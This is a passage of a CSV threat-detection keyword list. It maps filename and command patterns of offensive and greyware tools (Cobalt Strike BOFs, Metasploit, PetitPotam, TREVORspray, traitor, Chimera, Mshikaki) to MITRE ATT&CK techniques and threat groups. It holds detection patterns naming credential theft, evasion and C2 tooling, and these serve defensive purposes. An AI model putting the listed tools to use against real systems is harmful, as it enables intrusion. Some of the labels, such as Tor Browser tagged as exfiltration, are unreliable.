- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*token-vault.x86.o*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*TokenViewer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*tokyoneon/Chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*tomcarver16/ADSearch*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*tomcat_mgr_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*tomcat-rootprivesc-deb.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*tomcatWarDeployer -v -x -p * -H * ","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Tool-PassView*","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*tools/adfind*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tools/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*top100_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*top1000_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*Top109Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top12Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top1575-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top1pt6Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top207-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top29Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top2Billion-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top304Thousand-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Top353Million-probable-v2.txt*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*topotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*topotam/PetitPotam*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*tor_hiddenservices.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*tor_services.py*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*TORAnonymizer.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*TorBrowser-*macos_ALL.dmg*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*torbrowser-install-*_ALL.exe","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*torbrowser-install-win*.exe*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*tor-browser-linux*_ALL.tar.xz*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*torproject*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*torproject.org/dist/torbrowser/*.*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--tor-proxy*--pwndb*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*TorPylle*","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","1","91","23","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z" +"*TorServiceSetup*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","0","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*totally legit pdf.pdf*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*toteslegit.ps1*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*touch -a*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -m*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -r *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -t *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*tplmap*","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3438","670","2023-08-31T14:59:40Z","2016-07-06T20:33:18Z" +"*trailofbits/onesixtyone*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"*trainr3kt/MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" +"*trainr3kt/Readfile_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" +"*traitor -a *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor --any *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor -e *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor --exploit*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor -p *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*Transfer done (but failed to open directory).*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*tree_connect_andx_request*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*TrevorC2*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" +"*trevorproxy ssh*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorproxy subnet*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorsaudi/Mshikaki*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*trevorspray -*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray *--recon *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*trevorspray -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*trevorspray.cli*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.enumerators*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.looters*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.py*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.sprayers*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 